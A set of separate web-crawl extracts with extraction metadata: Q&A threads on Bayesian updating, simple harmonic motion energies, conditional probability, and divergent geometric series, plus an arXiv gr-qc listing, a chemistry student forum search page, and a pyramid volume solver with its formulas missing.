AFAIK directly handled in the language of Bayesian updating. Hope that helps. • Thank you for your comment, @Martin Modrak. I got your point. I modified the question. What happens if the first obvservation is $\mathbb E[p]>\frac{1}{2}?$ Within the model with the Beta conjugate, there are infinitely many possibilities that can draw $\mathbb E[p]>\frac{1}{2}$. In that case, are the two events interchangable? Sep 4, 2019 at 2:55 • @Andeanlll I don't think $\mathbb E[p]>\frac{1}{2}$ can be treated as an observation either. I tried to expand my answer on that. Sep 4, 2019 at 5:19 In Bayesian inference, terms like "observation" and "event" are just conveniences; there is no fundamental importance to them, so don't get hung up on them. In particular, there is no physical causality or time's arrow -- no "events". Whether you can carry out some calculations in more than one order depends solely on the form of the model. If, algebraically, the results are the same assuming different orders of assignments to some variables (i.e., "observations"), then, terrific, you can do whatever is convenient. If not, well, so what? About the representation of p > 1/2, you could represent that as a likelihood function which is just a step at 1/2. That is, it is zero to the left of 1/2, and any positive constant to the right. Note that ordinary "observations" yield likelihood functions which vary smoothly, but the smoothness is not a requirement. In order for this to be the case, the random variables must be exchangeable. Your example is a little different since $$p>1/2$$ isn't an event. An event should be in the support of the likelihood. In this case, events are only constituted by binomial random variables, or sums thereof.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 19, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.909518301486969, "perplexity": 378.88779250514403}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652663012542.85/warc/CC-MAIN-20220528031224-20220528061224-00149.warc.gz"}
https://www.physicsforums.com/threads/shm-energies.211961/
# SHM energies 1. Jan 30, 2008 in SHM average K.E when done w.r.t to time is equal to average potential energy calculated w.r.t to time. but today in class when my sir asked me to to prove average K.e = average P.E I just tried integrating it w.r.t to displacement and then divided it with A , I thought this gives us av . energies in 1/4 vibration and as all the four parts are identical average will remain same , but i found that av . K.E=2*av. P.E I then done this again w.r.t to time and got the answer but still I am confused , about how can that come i.e K=2*P.E Can you offer guidance or do you also need help? Draft saved Draft deleted Similar Discussions: SHM energies
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9540147185325623, "perplexity": 2835.106504049171}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189474.87/warc/CC-MAIN-20170322212949-00112-ip-10-233-31-227.ec2.internal.warc.gz"}
https://aps.arxiv.org/list/gr-qc/1712?skip=100&show=25
# General Relativity and Quantum Cosmology ## Authors and titles for Dec 2017, skipping first 100 [ total of 423 entries: 1-25 | 26-50 | 51-75 | 76-100 | 101-125 | 126-150 | 151-175 | 176-200 | ... | 401-423 ] [ showing 25 entries per page: fewer | more | all ] [101] Title: Gravitational-wave luminosity of binary neutron stars mergers Journal-ref: Phys. Rev. Lett. 120, 111101 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Astrophysical Phenomena (astro-ph.HE) [102] Title: Probing the universality of synchronised hair around rotating black holes with Q-clouds Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Theory (hep-th) [103] Title: Cosmic acceleration from a single fluid description Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Theory (hep-th) [104] Title: Comment on "Construction of regular black holes in general relativity" Authors: K.A. Bronnikov Comments: 3 pages, no figures. arXiv admin note: text overlap with arXiv:1708.08125 Journal-ref: Phys. Rev. D 96 (12), 128501 (2017) Subjects: General Relativity and Quantum Cosmology (gr-qc) [105] Title: The quantum effect on Friedmann equation in FRW universe Journal-ref: AHEP 6758078(2018) Subjects: General Relativity and Quantum Cosmology (gr-qc) [106] Title: Stability of a black hole and the speed of gravity waves within self-tuning cosmological models Comments: 5 pages, no figure, RevTeX4 format; v2: correction of a sign mistake in Eq. (2), coming from Eq. (11) of Ref. [3], and of its numerical consequences, although our overall conclusions remain the same; and minor changes reflecting the version to appear in Phys. Rev. Lett Journal-ref: Phys. Rev. Lett. 120, 241101 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO) [107] Title: Black hole complementarity with the generalized uncertainty principle in gravity's rainbow Comments: 18 pages, 3 figures, version to appear in JCAP Journal-ref: JCAP, 02 (2018) 060 Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Theory (hep-th) [108] Title: Critical phenomena in the general spherically symmetric Einstein-Yang-Mills system Comments: 15 pages, 15 figures; v2: matches published version Journal-ref: Phys. Rev. D 97, 044053 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc) [109] Title: de Sitter geodesics in stereographic charts Authors: Ion I. Cotaescu Journal-ref: Mod. Phys. Lett. A Vol. 33, No 32 (2018) 1875002 Subjects: General Relativity and Quantum Cosmology (gr-qc) [110] Title: Self-acceleration in scalar-bimetric theories Journal-ref: Phys. Rev. D 97, 103516 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO) [111] Title: Decay of the de Sitter Vacuum Journal-ref: Phys. Rev. D 97, 065016 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Theory (hep-th) [112] Title: Waves on a vortex: rays, rings and resonances Journal-ref: J. Fluid Mech. 857 (2018) 291-311 Subjects: General Relativity and Quantum Cosmology (gr-qc); Classical Physics (physics.class-ph); Fluid Dynamics (physics.flu-dyn) [113] Title: Localization of transient gravitational wave sources: beyond triangulation Subjects: General Relativity and Quantum Cosmology (gr-qc); Instrumentation and Methods for Astrophysics (astro-ph.IM) [114] Title: Vainshtein Screening in Scalar-Tensor Theories before and after GW170817: Constraints on Theories beyond Horndeski Comments: 7 pages, 1 figure. Added references, corrected inconsequential typos in eq. (3) and (4), added discussion on the third Vainshtein screening branch and improved constraints in the Note added Journal-ref: Phys. Rev. D 97, 101302 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Phenomenology (hep-ph) [115] Title: Note on the character of the generic rotating charged regular black holes in general relativity coupled to nonlinear electrodynamics Comments: 5 pages, 1 figure, submitted to Ragtime 19 proceeding Subjects: General Relativity and Quantum Cosmology (gr-qc) [116] Title: The dynamics of difference Authors: Lee Smolin Comments: Latex 15 pages, no figues, small improvements Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Theory (hep-th); Quantum Physics (quant-ph) [117] Title: Quantum phase space trajectories with application to quantum cosmology Comments: 11 pages, 4 figures, the new version contains improved discussions Journal-ref: Phys. Rev. D 98, 026030 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Mathematical Physics (math-ph); Quantum Physics (quant-ph) [118] Title: Self-gravitating $Λ$-media Comments: 17 pages+ 3 pdf figures. Expanded version published on JCAP Journal-ref: JCAP 1901 (2019) no.01, 057 Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Theory (hep-th) [119] Title: Spin and maximal acceleration Authors: Giorgio Papini Subjects: General Relativity and Quantum Cosmology (gr-qc) [120] Title: Emergent inflation from a Nambu--Jona-Lasinio mechanism in gravity with non-dynamical torsion Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Phenomenology (hep-ph); High Energy Physics - Theory (hep-th) [121] Title: Quantum corrections to quartic inflation with a non-minimal coupling: metric vs. Palatini Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Phenomenology (hep-ph) [122] Title: Planckian charged black holes in ultraviolet self-complete quantum gravity Authors: Piero Nicolini Comments: 15 pages, v2: version in press on Physics Letters B Journal-ref: Physics Letters B 778 (2018) 88-93 Subjects: General Relativity and Quantum Cosmology (gr-qc) [123] Title: A new inflationary Universe scenario with inhomogeneous quantum vacuum Authors: Yilin Chen, Jin Wang Subjects: General Relativity and Quantum Cosmology (gr-qc) [124] Title: Collapsing spherical star in Scalar-Einstein-Gauss-Bonnet gravity with a quadratic coupling
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24652855098247528, "perplexity": 5139.243596594977}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710734.75/warc/CC-MAIN-20221130092453-20221130122453-00251.warc.gz"}
https://www.physicsforums.com/threads/conditional-probability.626763/
# Conditional Probability 1. Aug 9, 2012 1. I am going over some past Probability exam papers and cannot solve this question. Any help or advice would be much appreciated! 2. David eats cereal for lunch 60% of days. If he had ice cream for breakfast, then the probability that he eats cereal for lunch is only 0.25. If he didn't eat ice cream for breakfast then he would not eat cereal for lunch with probability 0.3. (a) Are the events that David ate cereal for lunch and ice cream for breakfast independent? (b) Show that P(David has ice cream for breakfast)=2/9 3. I (think I) have been able to work out part (a): Let the event cereal for lunch be A and ice cream for breakfast be B. The events A and B are independant if P(A$\cap$B)= P(a)* P(B). So P(A given B)*P(B)= P(A)* P(B) which gives us P(A given B)= P(A) and then when we sub in the values given in the question we get 0.25= 0.6 which is not true and thus proves they are not independent. Is this correct? For part b I have been using the partition theorem to try to show that P(B)=2/9. So P(B)= P(B given A)*P(A)+ P(B given Ac)*P(ac) which gives me P(B)*(0.75)=. And this is as far as I can get because I cannot work out how to find P(B$\cap$Ac)?? More than likely I have gone completely wrong from the very beginning. Any help would be very much appreciated please! Thank you:) 2. Aug 9, 2012 ### Ray Vickson I prefer to use a notation where the meaning of the symbols is apparent at once, so let I = {ice cream for breakfast} and C = {cereal for lunch}. You are given P(C) = 0.6 = 3/5, P(C|I) = 0.25 = 1/4 and P(Cc|Ic) = 0.3 = 3/10. Thus, P(C|Ic) = 7/10. Since P(C|I) and P(C|Ic) are different, C and I are dependent, as you said. P(C) = P(C & I) + P(C & Ic) = P(C|I)P(I) + P(C|Ic)P(Ic), and P(Ic) = 1-P(I). You can solve for P(I). RGV 3. Aug 9, 2012 Thank you! You have been very helpful Similar Discussions: Conditional Probability
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8259921073913574, "perplexity": 1280.9442413143338}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948512584.10/warc/CC-MAIN-20171211071340-20171211091340-00453.warc.gz"}
https://brilliant.org/discussions/thread/how-is-that-possible/
× # How is that possible?? This discussion has been deleted! Note by Atul Shivam 1 year, 4 months ago Sort by: I guess that you cannot let $$S=1+2+4+8+16+\ldots \infty$$ because the sum of the geometric progression does not converge (approaches infinity). Also, you cannot subtract equation $$(2)$$ with $$(1)$$ because both $$S$$ and $$2S$$ do not exist. · 1 year, 4 months ago I think you mean to say ,we can't find sum of geometric progression which converges to infinity!!! Is it so ??? · 1 year, 4 months ago Yes sorry for not being clear. · 1 year, 4 months ago Got a reason. If S is infinity. Then 2*infinity is also infinity. This means there will be nothing like 2S for infinity.Also you can't apply operations like addition or subtraction etc to infinity. If you will say that assuming n terms where n tends to infinity and apply operations. Then the result will be something which is likely to be. · 1 year, 4 months ago Before writing the statement "S is equal to.." you must prove the convergence of the series. If the series converges, then only it has a limiting value, which you may call S. If you assume that S exists before proving its existence, then anomalous results as the above may pop up. Here the series does not converge (rather it diverges) simply because its the sequence of its partial sums is not bounded. · 1 year, 2 months ago It looks like to be on the same pattern as we derive formula for infinite sum of G.P. But there was |r| < 1. We can't use this pattern in such case where |x| > 1. Because the terms are increasing at a large rate and uncertainty of one last infinitely large term may result in false value. · 1 year, 4 months ago I don't think so as we can add or subtract anything to infinity and it will not affect anything · 1 year, 4 months ago For |x|> 1 G.P. diverges. So, sum can't be found. · 1 year, 4 months ago What do you want to say, Can you please elaborate · 1 year, 4 months ago Well, i just want to say that infinity doesn't follow elementary operations. I need some time to give a proper explanation. I am very sorry that i couldn't explain it. · 1 year, 4 months ago Oh!!! Is it so · 1 year, 4 months ago Uncertainty of one term may result in this false value. Because if you get to same approach by using sigma instead of value. You will get the desired result. Explain me if you know the exact reason. · 1 year, 4 months ago Because infinite does not follow general Algebraic rule of operations(+,-,x,÷). · 1 year, 4 months ago Hey are you still in ISM dhanbad ??? · 1 year, 4 months ago Let us take an another geometric progression $$T_n= 1,\frac {1}{2},\frac {1}{4},\frac {1}{8},\frac {1}{16}......$$ and let $$S$$ be it's sum I.e $$S= (1+\frac {1}{2}+\frac {1}{4}+\frac {1}{8}+\frac {1}{16}......)----(1)$$ $$(2S =2+1+\frac {1}{2}+\frac {1}{4}+\frac {1}{8}+\frac {1}{16}......)----(2)$$ Now $$2S-2= (1+\frac {1}{2}+\frac {1}{4}+\frac {1}{8}+\frac {1}{16}......)$$ $$2S=4$$ and hence $$S= 2$$ which is absolutely correct as $$S$$ has actual value of $$+2$$. Why it seems to be correct and not the above one sorry for my poor English I am not very much fluent $$:-)$$ · 1 year, 4 months ago That's what I said earlier your procedure is correct when S is finite but same thing is not applicable when S is infinite because the value of $$\displaystyle \infty - \infty$$ cannot be determined. I am in 1st year of college(my age is 18). · 1 year, 4 months ago I was just asking because I am in the same city:) · 1 year, 4 months ago
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.965385913848877, "perplexity": 722.8639018945985}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00619-ip-10-171-10-108.ec2.internal.warc.gz"}
https://lavelle.chem.ucla.edu/forum/search.php?author_id=12480&sr=posts
## Search found 35 matches Wed Jun 13, 2018 11:48 am Forum: *Molecular Orbital Theory (Bond Order, Diamagnetism, Paramagnetism) Topic: Drawing orbitals [ENDORSED] Replies: 1 Views: 147 ### Drawing orbitals[ENDORSED] Does anyone know if we are expected to know how to draw d orbitals? I know we learned how to do s and p really well but I am unsure about d. Thanks. Sat Jun 09, 2018 11:21 am Forum: Calculating pH or pOH for Strong & Weak Acids & Bases Topic: 12.49 Replies: 3 Views: 187 ### 12.49 Does anyone know if for questions like 12.49 on the final, 12.49 Which is the stronger base, the hypobromite ion, BrO , or morphine, C17H19O3N? Justify your answer will we be given the pKb values? Thanks. Sat Jun 09, 2018 11:05 am Forum: Calculating pH or pOH for Strong & Weak Acids & Bases Topic: 12.19 Replies: 1 Views: 166 ### 12.19 Hello, I am struggling to understand question 12.19 from the textbook, The concentration of HCl in hydrochloric acid is reduced to 12% of its initial value by dilution. What is the difference in the pH values of the two solutions? The answer says that pH will increase by 0.92 but how do we calculate... Fri Jun 08, 2018 6:08 pm Forum: Identifying Acidic & Basic Salts Topic: Final Replies: 3 Views: 240 ### Final Does anyone know if we have to know the enthalpy changes for the breakdown formulas of acids (H-A) like written in section 12.9 on page 481? Thanks. Sun Jun 03, 2018 3:03 pm Forum: Determining Molecular Shape (VSEPR) Topic: Textbook 4.21 part d Replies: 3 Views: 109 ### Textbook 4.21 part d Hello, during discussion section my TA told us that we do not need to know specific angles for things besides the 6 basic structures if they were all bonded electron pairs. However, the answer to this problem in the solutions manual is 107 ^{\circ} for the N2H4 molecule. Do we have to be able to wri... Sat Jun 02, 2018 9:41 pm Forum: Shape, Structure, Coordination Number, Ligands Topic: Final Replies: 5 Views: 175 ### Final The lecture outline for coordination compounds listed these as the assignments, but does anyone know which ones we do not have to do as we skipped over the naming part of the chapter? Thanks. Read: Ch 17.5, 17.6, Box 17.1, Toolbox 17.1, Table 17.4 Do Problems: 29, 31, 33, 35, 37 Sat Jun 02, 2018 9:00 pm Forum: Hybridization Topic: Hybridization Notation Replies: 3 Views: 104 ### Hybridization Notation On page 124, the textbook lists the notation of the hybridization of an ethane molecule as $\sigma$ (C2sp3,C2sp3). Is this the notation we need to use every time we are asked to write out the hybridization of a molecule? Thanks. Sat Jun 02, 2018 8:48 pm Forum: Hybridization Topic: Electron Promotion Replies: 1 Views: 74 ### Electron Promotion Can someone please explain the concept of electron promotion in the hybridization of orbitals? I am confused about what the purpose of it is. Thanks. Sat Jun 02, 2018 8:43 pm Forum: Hybridization Topic: Hybrid Orbitals Replies: 3 Views: 170 ### Hybrid Orbitals Can someone please explain what the following means in the textbook? It is on page 123 for reference. h1 s + px + py + pz h2 s - px - py + pz h3 s - px + py - pz h4 s + px - py - pz Tue May 22, 2018 11:15 am Forum: Lewis Structures Topic: Spacing in Structure for Molecules with an Expanded Octet Replies: 1 Views: 87 ### Re: Spacing in Structure for Molecules with an Expanded Octet I don't think this matters for test 3, but when we get more into the different structures, there are rules for this kind of thing, based on which repulsion is greatest. Tue May 22, 2018 11:12 am Forum: Lewis Structures Replies: 3 Views: 111 Hello, I am kind of confused about how to determine on which molecule the radical should go. Does it go on the central atom, or on one of the bonding atoms? Is there a specific rule for this? Thanks. Tue May 22, 2018 11:10 am Forum: Lewis Structures Topic: Test 3 [ENDORSED] Replies: 4 Views: 342 ### Test 3[ENDORSED] Hi, just making sure, I know it says that the test in chapter 3, but on the Chemical Bonds sheet there is also material from chapter 6. Chapter 6 is not on the exam, correct? Thu May 17, 2018 3:31 pm Forum: Resonance Structures Topic: 3.59 part c resonance structure? [ENDORSED] Replies: 3 Views: 166 ### Re: 3.59 part c resonance structure?[ENDORSED] When a question asks to draw out the lewis structure of a molecule that has resonance, do we need to draw all the different resonance structures for it, or just one? Thanks. Thu May 17, 2018 3:30 pm Forum: Lewis Structures Topic: Naming compounds Replies: 3 Views: 149 ### Naming compounds Do we need to know how to name compounds and understand the structure of compounds based on their names for test 3 for drawing Lewis structures? Thanks. Thu May 17, 2018 3:28 pm Forum: Lewis Structures Topic: Dots vs lines to represent electrons Replies: 8 Views: 259 ### Dots vs lines to represent electrons Hello, Can we use lines to represent two electrons when drawing lewis structures? Not just for bonds but also for lone pairs on atoms. We did not discuss this in lecture but in discussion this was brought up as an option. Thanks. Tue May 08, 2018 9:30 pm Forum: Heisenberg Indeterminacy (Uncertainty) Equation Topic: Module Questions 21 and 22 Replies: 1 Views: 166 ### Module Questions 21 and 22 Please help. I keep doing these two questions from the modules and I get the same wrong answer every time. For 21 I get C and for 22 I get D but those are incorrect. Does anyone know how to solve these? Thanks. 21. The electron is not confined to the nucleus and we now know that the size of an atom ... Tue May 08, 2018 1:50 pm Forum: Wave Functions and s-, p-, d-, f- Orbitals Topic: Paramagnetic vs Diamagnetic Replies: 2 Views: 158 ### Paramagnetic vs Diamagnetic What is the difference between Paramagnetic vs Diamagnetic? Thanks Tue May 08, 2018 12:12 pm Forum: Quantum Numbers and The H-Atom Topic: Question 5 Worksheet 4 Replies: 1 Views: 132 ### Question 5 Worksheet 4 This is the question, but I do not understand why the answer is 32. If it is quantum number 4, shouldn't that mean, 4s^2, 4p^6, and 4d^10 and so that would be 18 and then two electrons can fit in each one with opposite spins, so it would be 36? Can someone please clarify? Thanks. 5. What is the maxi... Tue May 08, 2018 9:09 am Forum: Quantum Numbers and The H-Atom Topic: Quantum Mechanics Worksheet #9 [ENDORSED] Replies: 4 Views: 347 ### Re: Quantum Mechanics Worksheet #9[ENDORSED] Hi, was just wondering where you got this worksheet from? Thanks Sun May 06, 2018 12:17 pm Forum: Ionic & Covalent Bonds Topic: Midterm Topics [ENDORSED] Replies: 33 Views: 1791 ### Re: Midterm Topics[ENDORSED] Taizha 1C wrote:Does anyone know if we need to know aufbau, hund, and pauli principles? Yes, we need to know these. Fri May 04, 2018 5:25 pm Forum: Properties of Light Topic: Frequency and Wavelength Replies: 3 Views: 180 ### Re: Frequency and Wavelength Frequency and wavelength are inversely proportional. This can be seen in the equation of c=\lambda \nu If you rearrange this so that lambda and nu are on opposites sides of the equation, \nu = (c/\lambda) then you see that as lambda increases, nu decreases and so they are inversely proportio... Fri May 04, 2018 5:20 pm Forum: *Particle in a Box Topic: Midterm [ENDORSED] Replies: 1 Views: 325 ### Midterm[ENDORSED] Do we need to know anything about particle in a box for the midterm? Thanks. Tue May 01, 2018 5:50 pm Forum: Ionic & Covalent Bonds Topic: Midterm Topics [ENDORSED] Replies: 33 Views: 1791 ### Re: Midterm Topics[ENDORSED] Just making sure, on the document sent to us by email and posted here, it says Chemistry 14A-1 11am class. Is this for our class or a different one? Thanks Mon Apr 23, 2018 4:37 pm Forum: Photoelectric Effect Topic: Module Questions 33 and 34 [ENDORSED] Replies: 3 Views: 1415 ### Module Questions 33 and 34[ENDORSED] Hello, I managed to figure out 33 was 7.22x10-19J, but I do not understand how to then use this to solve 34. Can someone please help me? Thanks. 33. Molybdenum metal must absorb radiation with a minimum frequency of 1.09 x 1015 s-1 before it can emit an electron from its surface. Answer the followin... Mon Apr 23, 2018 4:32 pm Forum: Photoelectric Effect Topic: Module Question 31 and 32 Replies: 1 Views: 77 ### Module Question 31 and 32 Hello, I am trying to answer question 32, and I get that question 31's answer is 550.7nm, but I don't understand how to now solve 32. Could someone please help me? Thanks. 31. This and the following question relates to the same metal used in a series of photoelectric experiments. A. If 3.607 x 10-19... Mon Apr 23, 2018 4:30 pm Forum: Photoelectric Effect Topic: Module Question 29 Replies: 4 Views: 117 ### Module Question 29 Hello, could someone please help me answer this question? Thanks Light hits a sodium metal surface and the velocity of the ejected electron is 6.61 x 105 m.s-1. The work function for sodium is 150.6 kJ.mol-1. B. How much energy is required to remove an electron from one sodium atom? A. 2.501 x 10-22... Sat Apr 21, 2018 6:36 pm Forum: Bohr Frequency Condition, H-Atom , Atomic Spectroscopy Topic: 1J=1kg.m^2.s^-2 Replies: 3 Views: 94 ### 1J=1kg.m^2.s^-2 Hi, I am trying to understand how 1J=1kg.m^2.s^-2. How are these units equal to each other? Does anyone know the proof? Thanks. Sat Apr 21, 2018 6:32 pm Forum: Properties of Electrons Topic: 1.57 [ENDORSED] Replies: 2 Views: 133 ### Re: 1.57[ENDORSED] It's not one of the problems required for test 2 so I would not be worried about it for now. OR Tue Apr 17, 2018 4:54 pm Forum: DeBroglie Equation Topic: Second test questions [ENDORSED] Replies: 3 Views: 245 ### Second test questions[ENDORSED] Hello, I was just wondering since test 2 is until 1.5 and not 1.6, which questions does that equate to from the ones assigned? If these are the assignments, Read: Ch 1 Do Problems: 3, 5, 7, 9, 11, 13, 15, 21, 23, 25, 27, 33, 37, 39, 41, 43, 55, 57, 59, 65, 67, 69, To which question is applicable for... Fri Apr 13, 2018 3:44 pm Forum: Properties of Light Topic: Value of Speed of Light** (Shoutout to Dr. Lavelle for calling me out in lecture today) [ENDORSED] Replies: 4 Views: 170 ### Re: Value of Speed of Light** (Shoutout to Dr. Lavelle for calling me out in lecture today)[ENDORSED] Ya, the value used in the solution manual was 2.998*10^8, but in class we were using the rounded 3.00*10^8. Fri Apr 13, 2018 3:35 pm Forum: SI Units, Unit Conversions Topic: Do we have to convert final answer to make it simpler? [ENDORSED] Replies: 4 Views: 204 ### Do we have to convert final answer to make it simpler?[ENDORSED] Hello, I was just wondering if during tests we are going to have to convert to the lowest possible SI unit that our final answer is given in. For example if we get that the wavelength is 551*10^-9 m, do we have to convert it to 551 nm or can we just leave it in the original form in meters? Thanks. Fri Apr 13, 2018 3:29 pm Forum: Properties of Light Topic: Value of speed of light [ENDORSED] Replies: 4 Views: 154 ### Value of speed of light[ENDORSED] Hello I was trying to answer question 1.7 and when I looked in the solution manual I saw that it put the speed of light constant to be 2.998*10^8, however in class we were using the rounded 3.00*10^8 so I was wondering which one we should use in calculations? Thanks. Sun Apr 08, 2018 12:09 pm Forum: Empirical & Molecular Formulas Topic: Finding the molecular formula [ENDORSED] Replies: 5 Views: 187 ### Re: Finding the molecular formula[ENDORSED] An example of this is if you have an empirical formula CH2O. The molar mass for this would be 12.011+(1.008*2)+15.99=30.017 gmol-1. If it told you that the molar mass of the molecule you are trying to find, in this case Glucose is 180.102 gmol-1, than you would divide 180.102 gmol-1 by 30.017, and y... Sun Apr 08, 2018 10:57 am Forum: Significant Figures Topic: Amount of significant figures in calculations. Replies: 2 Views: 108 ### Amount of significant figures in calculations. Are we supposed to round calculations that aren't the final answers? How many significant figures am I supposed to use throughout the question and then how many do I need to use to calculate the final answer? Thanks. Thu Apr 05, 2018 2:52 pm Forum: Significant Figures Topic: Questions F11 Replies: 4 Views: 198 ### Questions F11 In question F11 in part c it asks to determine the mass percentage composition: 12.2% N, 5.26% H, 26.9% P, and 55.6% O. When I solved for the moles of O I got 55.6g/16.00gmol=3.48 mol because the number with the least significant figures is 3, but the solutions manual says 3.475 mol. Is this an erro...
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 1, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7648503184318542, "perplexity": 2567.8690604294748}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514575402.81/warc/CC-MAIN-20190922073800-20190922095800-00173.warc.gz"}
https://istopdeath.com/find-the-volume-pyramid-567/
# Find the Volume pyramid (5)(6)(7) The volume of a pyramid is equal to . Substitute the values of the length , the width , and the height into the formula to find the volume of the pyramid. Combine and . Cancel the common factor of . Factor out of . Cancel the common factor. Rewrite the expression. Multiply. Multiply by . Multiply by . Find the Volume pyramid (5)(6)(7)
